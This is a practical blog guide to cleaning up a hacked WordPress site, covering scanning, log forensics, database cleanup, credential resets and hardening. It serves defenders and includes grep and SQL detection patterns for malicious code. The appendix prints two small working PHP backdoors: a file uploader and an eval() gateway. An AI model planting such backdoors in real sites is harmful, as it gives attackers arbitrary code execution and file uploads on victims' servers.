A Forensic Guide to WordPress Hack Cleanup
So you’ve been hacked, now what??
In my last post on WordPress security, “How Secure is WordPress”, I suggested hiring a professional ASAP when you’ve been hacked. I’m sticking with that advice. Especially if your site is important to your business, it’s better to let someone who has experience cleaning up these kinds of messes take care of it, and take care of it quickly. There are many reasonably priced professional options out there: Sucuri, WP Security Lock and Unhack.us are names you see recommended often.
In this post I’d like to dive into my own cleanup process in hopes that the methodology is helpful. It’s not going to be as quick or clean as hiring someone else, but there are a lot of reasons you might want to do it yourself here. Maybe your site doesn’t have the resources to hire someone to do the cleanup? Or maybe you just want to see how it’s done? After all, what fun is it to hire someone else to do all the work? (Warning: fun level may vary and is not guaranteed).
There are a lot of post-hack guides out there. There’s the Google Webmasters hacked site guide, which is pretty good (though obviously not WordPress-specific). Plus there’s the official WordPress post-hack FAQ. Many of these guides have great info, but some are out-of-date, or focus on only one part of what is a multi-step process, or take a “nuke it from orbit” approach. Nuking it from orbit is indeed the only way to be sure, but if you’re worried about losing data, or don’t know exactly when the hack happened, or don’t have a good backup to restore on top of the smoldering rubble (yikes!) then a more forensic approach may work best.
WordPress Comprehensive Hack Cleanup List
1. Shut down site access.
2. Find the compromised files.
3. Find when & how you were compromised.
4. Remove the compromised files.
5. Restore clean versions of files.
6. Scan and restore database.
7. Reset keys and user passwords.
8. Harden site.
9. Re-launch site.
10. Keep an eye on things.
Before we get started on the individual steps, a few things to keep in mind.
I find it helpful to remind myself that the site I’m working on was probably hacked as a part of an automated process. Unless you’re running a really big site or are particularly unlucky, the hackers who messed up your site came across it as a result of scanning thousands and thousands of sites for a particular attack method.
You care about your site, they don’t. By that I mean they don’t care what the content is, they don’t care to drill deeply down into your site and understand what’s going on, they just want to achieve whatever scheme they are working on: distributing malware, stealing credit cards, hiding links to other sites for SEO purposes, sending spam, etc. Their approach is a broad shotgun method — hack as many sites as they can to make some money, promote their political agenda, just for the lulz, etc.
Also, while the malicious code is frequently very clever, it’s also frequently very sloppy, and rarely tailored to any particular site. So when you’re scratching your head asking yourself, “what were they thinking??” — remember that the answer is that they weren’t really thinking about your site at all in particular.
Finally remember this is a very quickly changing area. Hacks that work today may not work tomorrow, and the tools change and adapt to those changes as well. The general process that I’m describing will continue to work, but the tools will change. Who has the best scanner or the most effective firewall may change next week, but the fundamental basics like good passwords and file permissions don’t change much at all.
Ok, on with the cleanup steps!
Step 1. Shut down site access.
However they got in, the first step should be to keep them from doing any more damage. Can your site be down for a day or two while you go through this cleaning process? If so, you may want to do the cleanup right on your live site. Put up a temporary “site down for maintenance” message and you can start working through the live site right away.
If you can’t have that kind of downtime, then move the compromised site to an offline area or temporary URL, restore your live site from the most recent backup taken before it was compromised, and update everything on that version. Until you’ve done your full investigation and whatever hardening you decide on later, that restored live version is still a risk. If you have the time, do some hardening on the restored version as well so you don’t end up with two hacked sites.
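Whether you’re working on the live site or a temporary URL, lock down access to the site for anyone other than you. If you’re on Apache that could be as simple as a global ban in the top-level .htaccess file. The example below uses the Apache 2.2 access directives; on Apache 2.4 they only work through mod_access_compat, and “Require ip” is the native equivalent. E.g.: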
<Limit GET POST PUT>
order deny,allow
deny from all
allow from your.ip.here
</Limit>
I also recommend pausing your WordPress scheduled tasks (cron jobs) if you are working this way, so in wp-config.php put this:
define('DISABLE_WP_CRON', true);
Don’t forget to re-enable cron when you’re all done or you’ll get some pretty weird behavior!
These two methods should stop anyone from running the malicious code. Well, other than yourself…
This is also a good time to back up your site as-is; files & database! This might seem like a weird thing to do — since why would you want a copy of what’s been hacked, but if scanning or cleaning go wrong you may want to start over at this point.
Step 2. Find the compromised files.
Now it gets harder, finding all the files that have been compromised. This is critical since if you don’t get them all your site might get re-hacked even if you update everything on the site to the latest versions.
When they hacked your site, they probably dropped one or more malicious scripts and / or modified some existing files. The code they dropped could be anything from a tiny script that downloads something else when called remotely to a full PHP backdoor that lets a remote user do pretty much anything they want from a full user interface. Curious what a backdoor looks like and how it works? Check out the appendix of this article.
The automated way (using scanning plugins).
Do you use version control? If yes you may already know what the compromised files are. A simple “git status” from the command line will of course show you what files have been changed — and assuming you haven’t checked in any malicious code then you’ll see all the candidates right away. You should still do a scan of all files just in case you did check in malicious code and not realize it, or the code is under a git ignored directory. Version control gives you a big leg up here, but not being comprehensive is how you get re-hacked.
There are a lot of security plugins out there, and they all take slightly different approaches. The two important features a plugin can have for finding the malicious files are:
a. Verifying installed files (core, and ideally even the plugins and themes) using checksums against a known good version.
b. Scanning all the files from the server side, NOT just the public-facing website.
Verifying core (A) is pretty easy, after all the WordPress.org API provides a list of files and their checksums. If you use wp-cli there’s even a command to check:
$ wp core verify-checksums
and that will spit out any files that don’t match the core distribution (Danny van Kooten’s article about that here). Many other plugins do the same kind of validation. But that’s just core… What if your malicious files sit outside core in your plugins, themes, or as a PHP file alone outside of WordPress?
Wordfence is the only plugin I know of currently that fulfills both A & B above (there may be others as well, let me know if you know of one!). It can scan every file on the server side against known malware signatures, and it can also verify your core, plugins & themes against what’s listed on wordpress.org. Here’s what the output looks like:
An important caveat is that it can only scan plugins & themes listed on WordPress.org. If you’ve got a paid plugin or theme (or really anything you installed from outside the wordpress.org repository) then this scan won’t be able to check it for validity. A WordPress ecosystem where all plugins & themes were signed and then immediately verifiable no matter the source (like package managers such as yum/rpm) would be great, but we are seemingly still pretty far from that at the moment.
Don’t assume that because a plugin is a premium plugin that it is either safer or less of a target. As an example, I recently saw malware aimed at Gravity Forms (a premium forms plugin) where the first thing the malware did when run was replace part of Gravity Forms with a compromised version that would allow arbitrary uploads. Since it’s a premium plugin Wordfence’s validity check couldn’t detect that change, and as long as the compromiser code existed on the server (which existed outside of WordPress) it could continue to re-compromise the Gravity Forms file even if Gravity Forms was updated.
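For a premium plugin that can’t be verified against wordpress.org, one workaround is to compare the installed copy against a fresh download of the same version from the vendor. The sketch below assumes you have unpacked that known-good copy somewhere outside the web root; the function name and both paths are hypothetical.

```shell
# Compare an installed plugin directory against a known-good copy.
# Usage: compare_with_clean_copy /path/to/clean/plugin /path/to/installed/plugin
compare_with_clean_copy() {
  # -r walks subdirectories, -q only names the files that differ.
  # diff exits 0 (identical), 1 (differences found) or 2 (error);
  # only the error case is treated as a failure here.
  diff -rq "$1" "$2" || [ "$?" -eq 1 ]
}
```

Any “Files ... differ” or “Only in ...” line pointing at the installed copy deserves a closer look. Make sure both copies are the same version, otherwise every file touched by a legitimate update will show up too.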
Validity checks are important, but ultimately B (file scanning) is the more important step of the two. If the scan finds everything malicious, it has implicitly told you which files would fail verification too. Because no scanner is perfect, A can certainly complement B in coverage, but B is ultimately more critical, especially considering many hacks are totally new files, not just modifications of existing files.
VaultPress for example doesn’t verify file checksums, but it seems to do a good job of B, even beyond just scanning for malicious code. Here’s an example of a VaultPress scan:
The VaultPress scanner found the malicious code no problem, but also importantly pointed out a possible issue with TimThumb. TimThumb is a library that is no longer supported and had a history of a serious security issue, so running any version of it is a security risk (though running an older version with known exploits is a much much bigger risk).
This is great: it’s not saying TimThumb was how the site was exploited, or even that TimThumb is exploitable, just that it is a security risk that needs to be addressed. This is ideal behavior as far as I’m concerned, but VaultPress comes with a price tag of $29/site/mo. (which includes an Akismet license and the VaultPress backup service itself). This could be a great scanning solution if you already have it, or are looking for that kind of backup service, but it’s not something you’d want to install just to do a scan.
The exploit scanner plugin is another useful tool if you’re looking for something that is a little less automated. It can do A (though it can only verify core) and B, though what it reports for the scan in B is mostly going to be false positives because it looks for “suspicious” code, which in many cases is just normal use of functions like base64_decode() or eval().
At the time of writing this the exploit scanner plugin is also missing the latest WP core version signatures, which makes it less useful. That plus the amount of false positives is probably the reason for the low star rating on wordpress.org, but I have definitely found it to be a useful plugin when I know there is malware around but other methods aren’t finding it because it doesn’t match any known signature (or Wordfence is a prohibited plugin). The “high sensitivity” setting for the scan on Wordfence is similar in method, though not quite as broad (for better & worse). Especially if you have already installed Wordfence I would try high sensitivity there before installing yet another plugin.
The manual way (using command-line).
Scanning through all your files manually for possible malicious code is tough, as there are a huge number of ways that malicious code can be hidden. Greg Freeman has a good rundown of the different manual searches you can do. Let’s recap the basics of that kind of searching here.
Scan for recently changed files. For example to review all the PHP files changed in the last week:
$ find . -mtime -7 -name '*.php*'
The “*.php*” pattern would also find endings like .php5 that could possibly be executed as well. It doesn’t have to be just PHP files that are compromised; the malicious code could be injected into any file, even image files (it’s just harder to get your code to run that way). So you should also look through everything (drop the -name argument). I check -ctime as well as -mtime. The “m” option means the file’s contents have been modified; “c” means the file’s meta-information (inode) has changed, which could indicate a change in file permissions.
Especially if you’ve updated your site recently that find command could lead to a whole lot of results! Time to start grepping through them if you don’t see anything obviously unexpected just from the file lists. This command takes our file list from the step above and searches through all of them for a bunch of commonly used commands in malicious code:
$ find . -type f -mtime -7 -name '*.php*' -print0 | xargs -0 grep -iP "(exec|system|gzinflate|md5|eval|base64_decode)\s*\("
Make sure you set your time window broad enough! 7 days might not be long enough. This can be a lot of work, and even after spending a bunch of time carefully grepping through files it’s possible you might not get it all. This is why I actually use both methods: scan with Wordfence for what it thinks are malicious files and then also do some manual grepping myself to see if perhaps there was something Wordfence missed.
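The find-then-grep recap above can be wrapped into a small reusable function so the time window is easy to widen. This is only a sketch: the function name is made up for illustration, the pattern is the same short list used above (so expect false positives from legitimate code such as curl_exec()), and it uses find’s -exec so that file names containing spaces are handled.

```shell
# List recently touched PHP-like files that contain commonly abused calls.
# Usage: scan_recent_php [directory] [days]
scan_recent_php() {
  dir="${1:-.}"
  days="${2:-30}"
  # Match on either modify time or change time, then let grep print only
  # the names (-l) of files containing one of the suspicious calls.
  find "$dir" -type f -name '*.php*' \
    \( -mtime "-$days" -o -ctime "-$days" \) \
    -exec grep -liE '(exec|system|gzinflate|md5|eval|base64_decode)[[:space:]]*\(' {} +
}
```

For example, `scan_recent_php /var/www/example 90` (a hypothetical path) would list candidate files touched in the last 90 days; each hit still needs a human to read it.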
Step 3. Find when & how you were compromised.
Ok, so you’ve now found the compromised files. What do these files do exactly? If you used a scanner that told you what the code was (like the example above from VaultPress) then you already have a pretty good idea what these files might do. If you found it by hand or the scanner didn’t say exactly what it does then it’s time to dive into the code a bit.
My recommendation is to not dive too deep! Even after de-obfuscating and unpacking the code, it is not always clear what the code is trying to do. Don’t forget these hacks start out automated, and the code might not even work at all. Also it should go without saying, but DON’T RUN THE CODE ON YOUR SERVER!
If you really want to run it, set up a virtual machine with restricted access. For this article I set up an AWS micro instance with strong firewall rules to run the dangerous code on after I had figured out what it did.
I like unphp.net for code de-obfuscation. I have also used Sucuri’s DDecode, which can be better if there are multiple layers of obfuscation. Hopefully putting your code into one of those two will give you an idea of what it does. If you can’t figure out what it does, well… that’s ok… Rest assured it probably isn’t anything good!
Bad news though: just because you found the malicious code and maybe what it does, that doesn’t necessarily tell you much about how you were hacked in the first place. It also doesn’t tell you what malicious code has been on your server but may now be gone! It’s quite common for hackers to drop a full-featured backdoor, use it to upload more files for whatever they are trying to accomplish on your site, and then delete the backdoor afterwards, since the full backdoor is easier to detect. For example if they are aiming to get into your checkout process they might use the backdoor to edit your checkout templates to mail themselves your customer data, but then delete the backdoor so you don’t notice you’ve been hacked. They sure aren’t cleaning up after themselves to be courteous!
Ok, so let’s get to the how & when. Go back to that compromised file and look at the timestamps on the file. Notice the plural on “timestamps”! As mentioned back when we were talking about find commands, in Unix there is both a “modify” date and a “change” date. Normally the ls command shows “modify” (the actual file contents have changed), not “change” (meta-information like permissions has changed). The case where the two differ in a way that matters to our investigation is when a hacker uploads a .zip file and then extracts its contents. Upload a zip file of a PHP backdoor and unzip it, and the timestamp you see with ls -l is the original date of the file in the archive, not the upload date. The extraction date is still available as the “change” time, however. The “stat” command gives us that data:
$ ls -l yuck.php
Mar 5 2013 yuck.php
$ stat yuck.php
File: ‘yuck.php’
Modify: 2013-03-05 07:57:06.000000000 +0000
Change: 2015-05-28 15:31:22.496162407 +0000
So when we start grepping our access logs looking for when this file was created from a web request we should grep for 2015-05-28!
$ grep 28/May/2015:15:31 access_log
172.16.0.59 - - [28/May/2015:15:31:04 +0000] "POST /wp-content/uploads/1_upload.php HTTP/1.1" 200 - "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
If we find this we are really on their tail now. It looks like they managed to get a simple uploader script under the uploads directory and then used that to upload our “yuck.php” malware file.
Now just start grepping for that IP and you will hopefully be able to track back the request that they used to inject that uploader as well! That should be the initial breach. It might be a call to an out-of-date plugin with a major security hole, or a script completely outside of WordPress you forgot you had installed. If you’re not finding anything, try looking further back in your access logs (you might have been compromised some time ago, even many months), or it might be that the initial compromise came from a nearby IP but not quite the exact same one, in which case you can try grepping for just the start of the IP or looking up the full ranges available to that particular ISP.
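The step from a file’s “change” time to the matching access log lines can be scripted. The sketch below is illustrative only: both function names are invented, it assumes GNU stat (for `-c %z`), a log in the common/combined format shown above, and that the log is written in the same timezone that stat reports.

```shell
# Convert a stat-style timestamp ("2015-05-28 15:31:22.496162407 +0000")
# into the minute-resolution form used in the access log ("28/May/2015:15:31").
stat_time_to_log_stamp() {
  printf '%s\n' "$1" | awk '{
    split("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec", mon, " ")
    split($1, d, "-")
    printf "%s/%s/%s:%s\n", d[3], mon[d[2] + 0], d[1], substr($2, 1, 5)
  }'
}

# Print the access log lines from the same minute as a file's change time.
# Usage: requests_near_change yuck.php access_log
requests_near_change() {
  stamp=$(stat_time_to_log_stamp "$(stat -c %z "$1")")
  grep -F "[$stamp" "$2"
}
```

Matching on the minute rather than the exact second is deliberate: in the example above the upload request was logged at 15:31:04 while the file’s change time was 15:31:22. If nothing turns up, widening to the hour (or checking for a timezone offset) is a reasonable next step.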
Hopefully that all works and you find the smoking gun of when you were compromised. But maybe you don’t! I would say about 25% of the time I’m completely unable to find the initial point of attack in log files. Maybe the log files didn’t go back far enough, or maybe they distributed or otherwise hid their attack too well for me to find it. In these cases taking your best guess at what the point of attack was is all you can do. I find the best way to do that is to look at what exploits are known for the versions of software you are running. The WPScan Vulnerability Database is a good place to get that data, and I like Glen Scott’s Plugin Security Scanner which uses the WPScan data to tell you what in your WordPress install has known vulnerabilities. If you find a plugin that you have installed that has a remote code execution or arbitrary file upload hole, then that’s a good culprit, just look for something that matches the nature of your attack.
You can also try searching the exploit-db.com database for any plugin or external application you have available under your WordPress directory that you might suspect as the culprit. Just because you run WordPress it doesn’t mean your site was hacked via WordPress, even if they do end up defacing or otherwise mucking with your WordPress installation. Have an old copy of phpBB you forgot to delete running? phpMyAdmin? Any of those might have been the way in.
Finally no vulnerability database discussion would be complete without mentioning CVE, the most comprehensive vulnerabilities index out there. I like the CVE details site which is a (somewhat) user-friendly way to search all the CVE vulnerabilities out there. It even includes the data from the exploit-db database.
Step 4. Remove the compromised files.
This part is self-explanatory. Get rid of it, and don’t just move it out of your web directory, get it off your server. Print it out, stomp on it, set it on fire.
Step 5. Restore clean versions of files.
If your scan found modified files then now is the time to restore a known clean version of each file. If it was within a plugin or theme I recommend re-installing the entire plugin/theme. The Sucuri Scanner has the ability to bulk re-install your non-premium plugins under the “Post-Hack” area. If you’re restoring from your own backups be wary. Just because you only saw the effect of the hack last week doesn’t mean that a hacked version of one of your files hasn’t been sitting around for a year.
Step 6. Scan and restore database.
We haven’t talked about the database yet, but certainly in some hacks (like some defacements or adding rogue admin users) you won’t see a file, only an entry in the database.
First, review your users and make sure there are none that shouldn’t be there. If you find any malicious users, make sure to check whether they’ve published any content and clean that all up if so.
Rogue content in your database is a good news / bad news situation. The good news is that it’s most likely only bad content in the database advertising or linking to something that is spammy, not bad code or attacks on things like your checkout process, etc. The bad news is that because it is frequently just content it can be hard to find. Tools like Wordfence and Exploit Scanner do search through the database as well as files for malicious content, but things like defacements or spam links are more likely to be found by users unfortunately.
Maybe you already saw or got reports of bad / defaced content. Maybe Google Search Console (Webmaster Tools) told you about it. In any case if you’ve got the HTML you’re looking for searching the database using whatever database tool you have at your disposal (phpMyAdmin, Adminer plugin, etc.) should be pretty straightforward. If phpMyAdmin is not something managed by your hosting provider I do not recommend installing it as it may cause security issues down the road. Adminer is a phpMyAdmin-style tool that can work inside WordPress and use WordPress’ authentication and update system to stay safer (though still you should remove it after cleanup if you have no other use for it).
Frequently malicious content is hidden behind iframes or similar methods. Doing a REGEX search in MySQL is the equivalent of our manual find searches before: it can find things that the scanners might have missed, but it is a lot of work and full of false positives. Here’s how I’d search the whole database via phpMyAdmin’s global database search:
So that breaks down to individual searches of every column in a table like this:
SELECT * FROM `yrdatabase`.`wp_options`
WHERE (CONVERT(`option_id` USING utf8) REGEXP '(<iframe|<\\?(php)?|<noscript|display:none)'
OR CONVERT(`option_name` USING utf8) REGEXP '(<iframe|<\\?(php)?|<noscript|display:none)'
OR CONVERT(`option_value` USING utf8) REGEXP '(<iframe|<\\?(php)?|<noscript|display:none)'
OR CONVERT(`autoload` USING utf8) REGEXP '(<iframe|<\\?(php)?|<noscript|display:none)')
Once you find the malicious content you can edit the data in the same tool. The only exception to this is if it is stored as serialized data. For example the wp_options table is a popular place where bad content has frequently been stored in the past, and that data can be serialized (which looks like this):
a:154:{s:18:"woo_alt_stylesheet";s:11:"default.css";s:8:"woo_logo";s:71:"https://www.blah.com/wp-content/uploads/2012/06/....
That means if there’s data stored like that and you edit it directly it’ll break the data structure: each serialized string records its own length, so changing the text without updating the count corrupts it. For global search & replaces that include serialized data I like the wordpress db search replace tool from interconnectit since it handles that data without breaking stuff. If you use that tool make sure to delete it when you’re done, otherwise you’ve just left a new backdoor!! I usually rename it right after I unzip it, just in case.
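To make the serialized-data problem concrete: in a fragment like s:11:"default.css"; the 11 is the byte length of the string that follows, and PHP refuses to unserialize the value if the two disagree. The sketch below checks a single string fragment; the function name is made up, and it deliberately handles only this one simple form, not full serialized arrays.

```shell
# Check that a single serialized PHP string fragment, e.g. s:11:"default.css";
# declares the same length as the value it carries.
# Exit status: 0 = consistent, 1 = length mismatch, 2 = not in the expected form.
serialized_string_ok() {
  printf '%s\n' "$1" | LC_ALL=C awk '{
    if (match($0, /^s:[0-9]+:"/) == 0) exit 2
    declared = substr($0, 3, RLENGTH - 4) + 0   # digits between "s:" and the next ":"
    value = substr($0, RLENGTH + 1)             # everything after the opening quote
    sub(/";$/, "", value)                       # drop the closing quote and semicolon
    exit ((length(value) == declared) ? 0 : 1)
  }'
}
```

Hand-editing "default.css" to a shorter or longer name while leaving the 11 in place is exactly the kind of change that fails this check, which is why a serialization-aware search and replace tool is worth the trouble.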
Step 7. Reset keys and user passwords.
Now that we think we’ve gotten the crud out, it’s time to make sure they don’t get back in.
Time for some password resetting. I know it’s annoying and can break things and upset users, but it’s important!
a. Reset the WordPress salts in the wp-config.php. This will also log you out. Many plugins offer this functionality (including iThemes Security and Sucuri), also you can do it manually and get a new block of secret keys from WordPress.org directly.
b. Change any other passwords that might have been exposed: ftp user password, shell account, email, database, third party login, etc. Remember, they had access to all your web server user-accessible files, so if you have a password or key in a config file they could now have it. If that web server user could read it, they might have found it.
c. Make your users reset their passwords. Don’t ask them to do it, you have to do it for them, otherwise many people won’t bother to change theirs which might let the hackers right back in. The Sucuri plugin among others offers this functionality in bulk, or if you have a small number of users you can just do it manually.
Step 8. Harden site.
Hardening your site is a full guide all by itself, but let’s hit some basics:
a. Set up a security plugin. I prefer iThemes Security for hardening, which does all of the other things on this list.
b. Enable brute force login protection and/or move login URL away from /wp-admin to something of your choosing.
c. Enable strong passwords (minimally for admins).
d. Don’t have a user named “admin” or a user with ID 1.
e. Disable PHP execution under the uploads directory.
There’s more too, but those are in my opinion the most critical. My iThemes Security configuration generally ends up looking like every high & medium item turned on, excluding away mode, renaming the database prefix, scheduled backups (since those are done elsewhere), and maybe or maybe not two-factor auth.
You don’t have to hit every single item in the iThemes security dashboard list, but all the high & medium items aside from the ones I named above are good ideas without much risk of breaking things.
File Permissions!
This is the most basic part of Unix security, but sadly also the most common source of spreading problems. Whatever you can do to lock down file permissions can save you more consistently than almost anything else. Again this is something deserving of its own separate post, but the general best practices are:
-Don’t allow the web server user to write to anything it doesn’t need to!
-Especially don’t let that user write to .htaccess and wp-config.php.
-Nothing should be world-writable.
-If you have multiple sites on the same server, have them owned by different users and not able to write across sites. Otherwise if one site gets hacked that infection can easily spread to other sites on your same server.
The WordPress.org hardening FAQ is good for more info here.
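A quick way to audit the “nothing should be world-writable” rule is to ask find for anything with the “other” write bit set. This is a minimal sketch; the function name is hypothetical and it only reports, it does not change any permissions.

```shell
# List files and directories under a site root that any user can write to.
# Usage: find_world_writable /path/to/site
find_world_writable() {
  # -perm -0002 matches anything with the "other" write bit set.
  # Only regular files and directories are tested, so symlinks are skipped.
  find "$1" \( -type f -o -type d \) -perm -0002
}
```

An empty result is what you want. Anything listed can usually be tightened with chmod o-w, after checking that the web server doesn’t depend on that access through the “other” bits.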
Another small example. I worked on a site that had a vulnerable version of an upload manager, and this hole allowed hackers to place whatever files they wanted on the server. But in this case the only area that was writable by the webserver user was wp-content/uploads, and since that area was also not allowed to run PHP, they couldn’t actually do any harm and all I had to do was delete some harmless junk files! These kinds of safety guards don’t generally stop the point of initial breach (the bad plugin, etc.), they just contain or maybe even completely prevent damage.
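Since the uploads directory is normally meant for media, listing anything PHP-like under it is a cheap check both during cleanup and afterwards. A minimal sketch, with a made-up function name, assuming a find that supports -iname (GNU and BSD find both do):

```shell
# List files under the uploads directory that the web server might run as PHP.
# Usage: find_php_in_uploads /path/to/wp-content/uploads
find_php_in_uploads() {
  find "$1" -type f \( -iname '*.php*' -o -iname '*.phtml' \)
}
```

Not every hit is malicious (some plugins drop a placeholder index.php in their upload folders), but something like the 1_upload.php from the log example earlier would show up here immediately.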
Step 9. Re-launch site.
OK! Almost there. First make sure everything is up-to-date. You’ve hopefully got all the malicious code out, but the initial vulnerability you got hacked by might still be there if you haven’t already updated everything.
Turn stuff back on! Remove your .htaccess block, turn back on WP cron, notify your hosting provider if it was them who shut you down, etc. If you made it on any blacklists now is the time to ask for reviews from those as well. Here are the review instructions from Google.
Step 10. Keep an eye on things.
Ok, so what does that mean? For me that means turning on all the “nagging” notifications you can about site activity. Login history, file change history, access logs, error logs. Especially file change history is key here! iThemes Security offers this via a daily email notification with all the files that have been changed. This means a lot of lines in the email if you update stuff, but it also means if you missed something and you get re-hacked you’ll know right away, which may prevent your users from seeing the problem or you getting back on any blacklists.
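If no plugin is available for file change history, the same idea can be approximated from the command line by keeping a checksum baseline and diffing against it. This is a rough sketch, not a replacement for a real monitoring tool: the function names are invented, it assumes sha256sum from GNU coreutils, and the baseline file should live somewhere the web server user cannot write.

```shell
# Print "hash  ./path" for every file under a directory, sorted by path.
# Usage: snapshot_files /path/to/site > /safe/place/baseline.txt
snapshot_files() {
  (cd "$1" && find . -type f -exec sha256sum {} + | sort -k 2)
}

# Show files that were added, removed or modified since the baseline.
# Lines starting with "<" come from the baseline, ">" from the current state.
# Usage: changed_since /path/to/site /safe/place/baseline.txt
changed_since() {
  snapshot_files "$1" | diff "$2" - | grep '^[<>]'
}
```

Run from a scheduled job, any output from changed_since is the signal to go look. Remember to refresh the baseline after legitimate updates, or every upgraded file will be reported.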
Wrap-up.
I’ve sure mentioned a lot of plugins and tools in this article. I’m not exactly happy about that; I’d like to be able to recommend just one plugin or tool that can do everything, but as you can tell it is a very broad subject. Here are my opinions on which plugins I like best for what purpose:
– Best scanning tools: Wordfence
– Best post-hack tools: Sucuri Scanner
– Best hardening tools: iThemes Security
When it comes to security plugins not every host allows every plugin. For example WPEngine doesn’t allow Wordfence, so if you’re in a managed WordPress hosting environment you might find you’re unable to use some of these plugins. The good news is that if you’re in a managed WordPress host you’re less likely to be hacked in the first place.
If for some strange reason you are still reading at this point (thank you and congratulations!), this may all seem like a pretty huge amount of work. Sometimes it certainly can be a lot of time and energy, but with the right tools and some experience of what to look for it isn’t as bad as it all sounds and there are a lot of great tools to make your job easier. Still, this is clearly a time where an “ounce of prevention is worth a pound of cure” holds very true, so until the day you need this guide make sure to stay vigilant with prevention!
Appendix
What does a PHP backdoor look like, how does it work?
When I say backdoors can do “pretty much anything”, I mean run anything on your server that can be run by the webserver user. For example the common backdoor sometimes called “FilesMan” gives a point-and-hack interface.
Here’s what it looks like:
There is a surprising amount of functionality in this script. You could:
- upload any file you want.
- run a find command on the system to locate any configuration file (there’s a shortcut for that!).
- find user hashes and then auto-search external hash lookups! (thus easily crack lots of md5 hashed info).
- and many more…
Here’s the screen to mass update all files with the defacement message of your choice:
So the spelling might need some work… but the UI is pretty good, better than a lot of “legitimate” tools I’ve used!
FilesMan is one of the most feature-rich backdoors that might be dropped, but a backdoor could be as simple as a tiny file uploader:
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload ok :d !!!'; }
else { echo 'Upload Fail !!!'; }
}
Or a trivial gateway to allow anyone with the right parameters passed to execute any arbitrary PHP code via eval():
if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == '8a122d54ea4b01bb173517d98f00327e') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); }
There’s not much to either of those, but both are of course enough to allow further mischief.
There is infinite variety to these kinds of hacks, but hopefully seeing the code un-obfuscated and in action will help you identify and understand what’s going on a little better.
Great points.
One thing I have seen previously after a cleanup is that spammy shop links were added to existing content going back years – these can be hard to spot. Especially so if you don’t take database backups to check against.
Luckily for us the links were added via the admin panel under a malicious user – so it was a simple case of reverting each post to the previous version. Unfortunately we had to go through each post by hand.
We now run https://wordpress.org/plugins/simple-history/ so that in the event of a user breach we can see which actions were taken. Unfortunately this doesn’t protect against manual database edits as they leave hardly any audit trail.
Thanks Richard! I agree the changes in the database itself can be really hard to root out, since really what’s to distinguish a spam link from a regular link other than the destination? Wordfence does search the database as well as the files, but it can be hard to catch that stuff. Front-end scanning for spamvertising via the premium version of Wordfence or the free Sucuri sitecheck tool (https://sitecheck.sucuri.net) can root out some of those links for people who weren’t as lucky as you to have it traced all to one user.
Manual database edits are indeed even harder to trace, but if someone is making a manual database edit they likely either have some backdoor installed or got in via some kind of serious misconfiguration of database access, so hopefully once you root that out you can see any malicious user activity just via an audit plugin like you point out.